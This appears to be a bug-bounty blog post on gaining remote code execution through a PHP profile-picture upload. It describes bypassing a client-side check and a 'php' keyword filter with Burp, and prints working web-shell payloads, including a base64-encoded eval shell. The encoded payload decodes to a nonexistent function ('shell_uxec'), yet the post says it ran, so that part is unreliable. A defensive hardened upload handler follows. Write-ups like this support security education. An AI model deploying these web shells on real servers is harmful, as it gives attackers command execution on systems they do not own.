Introduction
In this post, I’m going to explain how I found a Remote Code Execution (RCE) vulnerability simply by uploading a profile picture. The server did have some filtering checks in place, so we need to understand how it reacts to each request that contains malicious characters. It’s easier than it sounds, and if you’re into bug hunting or penetration testing, this is something you’ll want to know!
What is RCE?
Remote Code Execution (RCE) is when an attacker can run any command they want on a server from a distance. Imagine being able to control a website’s server just by uploading a file — scary, right? That’s what RCE allows.
How File Uploads Can Be Dangerous
Many websites let users upload files like images or documents. But if the website isn’t careful with what files it accepts, an attacker could upload a file that does more than just store data — it could take over the server. That’s where RCE comes in.
How I Found the Vulnerability
Here’s a step-by-step breakdown of how I discovered RCE through file uploading:
1. Analyze the Hosting Server and Its Programming Language
The first thing to analyze is the hosting server: what kind of server the application is hosted on and running. There are two ways to identify this:
- Using the Wappalyzer extension.
- Observing the Response Headers (the Server header in particular).
Based on the above, the server is “Apache”, which confirmed it was worth trying to escalate to RCE.
2. Uploading php file on Profile feature
- In the profile upload feature, I initially tried uploading a .php file, but there was a client-side restriction that only allowed image files like .jpg and .png. To bypass this, I uploaded an image and intercepted the request using BurpSuite.
- Once I captured the request, I changed the file extension to .php and injected a simple PHP payload to execute commands via the GET method:
<?php system($_GET['cmd']); ?>
Although the server accepted the .php extension, it blocked the PHP payload due to some server-side filtering. I began experimenting by gradually removing special characters from the code and observing the server’s response. After some trials, I discovered that the server blocked files if the word “php” was detected. If it wasn’t present, the upload would succeed.
Blocked payload: <?php system($_GET['cmd']); ?>
Accepted payload: <? system($_GET['cmd']); ?>
Here, the payload was uploaded but it could not be executed (PHP only honours the bare <? open tag when the short_open_tag setting is enabled, which it evidently was not here).
3. Crafting a Malicious Code
Next, I tried various PHP scripts, all of which were successfully uploaded, but none of them were executable. I didn’t give up! After thinking it over, I wondered, why not try sending the payload in an encoded format?
I decided to craft a PHP script using base64 encoding. The final payload was:
<?=eval(base64_decode('ZWNobyBzaGVsbF91eGVjKCRfR0VUWydjbWQnXS4nIDI+JjEnKTs='));?>
I injected this payload, and it successfully executed. BOOM! RCE achieved!
Malicious code injection
Code Execution
Why Did This Work?
This vulnerability existed because:
- The server didn’t restrict file types: it allowed me to upload a dangerous file like .php.
- The file upload directory allowed execution of scripts, meaning my PHP file was able to run.
- The website didn’t properly check or sanitize the contents of uploaded files.
How to Protect Against This
Developers can prevent RCE vulnerabilities by:
- Restricting allowed file types: Only allow safe file types like .jpg, .png, or .pdf.
- Validating file contents: Check that the file is what it says it is. Don’t just rely on the extension.
- Storing files securely: Store uploaded files in a folder where they can’t be executed, even if they contain malicious code.
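The three mitigations above, and the lesson from step 2 (a filter that looks for the keyword “php” is defeated by simply dropping the word), can be put into a single upload handler. The following is an added example written for this post, not code from the vulnerable application; the form field name “avatar” and the storage path “/var/uploads/avatars” are hypothetical, and the storage directory is assumed to sit outside the web root.

```php
<?php
// Added example (not the post's code): a hardened profile-picture upload handler
// that applies the three mitigations listed above. Hypothetical names: form field
// "avatar" and storage path "/var/uploads/avatars", which sits outside DocumentRoot.
declare(strict_types=1);

// Mitigation 1: allowlist of content types, keyed by the MIME type detected from
// the bytes, mapped to the only extension we will ever write to disk.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Mitigation 2: decide from the file's content whether it is a real image.
 * Returns the safe extension to store it under; throws on anything else.
 * The client-supplied filename and Content-Type header are never consulted.
 */
function validateImageUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed, error code ' . ($file['error'] ?? 'none'));
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('Missing or oversized upload');
    }

    // Type from magic bytes (libmagic), not from the extension the client chose.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException("Rejected content type: $mime");
    }

    // The image must actually decode, and as the same type libmagic reported.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('File is not a decodable image');
    }

    // A valid image can still carry PHP in its metadata or trailing bytes, so
    // reject any PHP open tag. This matches "<?php", "<?=" and the bare "<? "
    // form, rather than the keyword "php" alone, which the post shows being
    // bypassed by dropping the word.
    $bytes = file_get_contents($file['tmp_name']);
    if ($bytes === false || preg_match('/<\?(php\b|=|\s)/i', $bytes) === 1) {
        throw new RuntimeException('Embedded PHP tag in image data');
    }

    return ALLOWED_TYPES[$mime];
}

/**
 * Mitigation 3: store under a server-generated name, with a server-chosen
 * extension, in a directory the web server does not execute scripts from.
 * Returns the stored filename, to be served back via a read-only download script.
 */
function storeProfileImage(array $file, string $storageDir): string
{
    $ext  = validateImageUpload($file);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // 32 hex chars, no user input
    $dest = rtrim($storageDir, '/') . '/' . $name;

    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store upload');
    }
    chmod($dest, 0640);   // readable by the web server, never executable
    return $name;
}

// Usage, assuming the hypothetical form field "avatar":
// $stored = storeProfileImage($_FILES['avatar'], '/var/uploads/avatars');
```

Both payloads from step 2 fail this handler twice over: libmagic does not report them as an image, and the open-tag check fires regardless of whether the word “php” is present. On Apache with mod_php, back the third mitigation up at the server layer as well, by setting php_admin_flag engine off in the Directory block for the storage path (or keeping that path outside DocumentRoot entirely), so that a script which slips through some future validation gap still cannot run.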
Conclusion
Finding RCE via file uploads isn’t hard if you know what to look for. It’s about testing how the server handles files and checking if you can upload something dangerous. If you’re a beginner, try playing around with file upload forms, and you might find similar issues.
Hope you enjoyed this post! If you’re into bug bounties or security research, this method could help you discover some serious vulnerabilities. Stay safe, and happy hacking!
Let’s Keep in Touch
- Twitter: https://x.com/akashoffsec
- LinkedIn: https://www.linkedin.com/in/akash-a-687abb250/
- GitHub: https://github.com/akashoffsec